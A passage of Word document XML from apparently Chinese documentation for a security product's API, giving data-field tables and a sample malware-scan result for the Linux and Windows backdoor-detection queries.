      <w:tr w:rsidR="00BC669E" w14:paraId="23F9CE30" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="610CADF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parentProcessName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E7B1BB9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13E36220" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="153817E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="63E89950" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4167D60A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parentPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="478B05DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B6CCD05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58021B92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D4E73C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BC2102" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>data:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"root\",  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>processPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\",  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentProcessName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">\" : \"bash\",  </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"/bin/bash\",  \"path\" : \"/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\",  \"size\" : 1223123,  \"type\" : \"regular file\",  \"user\" : \"root\",  \"group\" : \"root\",  \"permission\" : \"0755\",  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>changeTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : 1545633340,  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>modifyTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : 1545633340,  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accessTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : 1545806233,  \"md5\" : \"1e6237ef30bc132155cdc3a39ad29d71\",  \"sha1\" : \"9e0fc9af130255fdd42d70ca9aea4dfff8a3b46b\",  \"sha256\" : \"d63afb1cdaa6b354c4dbafc75e1b146e1d79152f58d725b3208070282d4a70b8\",  \"codeSectionMd5\" : null,  \"codeSectionSha1\" : null,  \"codeSectionSha256\" : null,  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ruleResults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : [ {    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virusName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"LINUX/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Setag.ztrec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\",    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virusDescription</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"Contains detection pattern of the Linux virus LINUX/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Setag.ztrec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\",    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libUpdateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : 1534953600,    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"Avira\",    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virusInstruct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : null  }, {    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virusName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"Unix.Malware.Agent-1407158\",    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virusDescription</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : null,    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libUpdateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : 1537169743,    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clamAV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\",    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virusInstruct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : null  }, {    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virusName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tezheng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\",    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virusDescription</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"\",    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libUpdateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : 0,    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"青藤库\",    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virusInstruct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : null  } ]}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4B3ED7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="479" w:name="_Toc115166312"/>
      <w:bookmarkStart w:id="480" w:name="附录2-windows后门检测-查询结果-data数据结构"/>
      <w:bookmarkEnd w:id="458"/>
      <w:bookmarkEnd w:id="478"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>附录2 Windows后门检测-查询结果-data数据结构</w:t>
      </w:r>
      <w:bookmarkEnd w:id="479"/>
    </w:p>
    <w:p w14:paraId="5AB69459" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="481" w:name="_Toc115166313"/>
      <w:bookmarkStart w:id="482" w:name="后门类型可疑进程"/>
      <w:r>
        <w:t>后门类型：可疑进程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="481"/>
    </w:p>
    <w:p w14:paraId="2965F6CC"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1041"/>
        <w:gridCol w:w="828"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="2704"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="17F2777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7B9A921" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="389A3998" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FA0578F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="154BCC8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="685F6019" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BDDE5F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ret_code</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ACB6D54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="092DDF06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FD1A2CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>返回code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="66816151" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DF67FD1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ret_msg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64923B82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5901C81C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3466CADD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>返回message</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4964FBA6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C7F42E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>parent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0935A582" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A1B11B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B82863F" w14:textId="31681104" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程，见</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "item数据结构" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>item数据结构</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="467F198E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4216E433" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="033D4AA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61659F24" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="129703F2" w14:textId="00619B6D" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>当前进程，见</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "item数据结构" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>item数据结构</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="150430BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="483" w:name="_Toc115166314"/>
      <w:bookmarkStart w:id="484" w:name="item数据结构"/>
      <w:r>
        <w:t>item数据结构</w:t>
      </w:r>
      <w:bookmarkEnd w:id="483"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2327"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="4387"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="16F4870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CCE4F19" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71BD51C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06F6A453" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F0AA8A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1380A814" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DECDD27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>process_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42ECF131" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16EDBE58" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39ABEBC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="030C78E9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49BCD3FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C1D911C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4554D735" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62D0E5CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="09C2FC69" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10874628" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parent_process_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="309B3943" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DF089D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FE405E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="576476F1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1859EFEF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>create_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D56689C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06F7F8C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
